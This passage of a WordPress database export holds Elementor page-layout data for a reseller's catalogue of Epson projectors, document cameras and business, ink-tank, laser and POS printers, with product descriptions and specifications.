]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8005,3487,'_elementor_version','2.5.14'),(8008,3488,'_wp_page_template','template-fullwidth.php'),(8009,3488,'_elementor_edit_mode','builder'),(8010,3488,'_elementor_template_type','post'),(8011,3488,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class 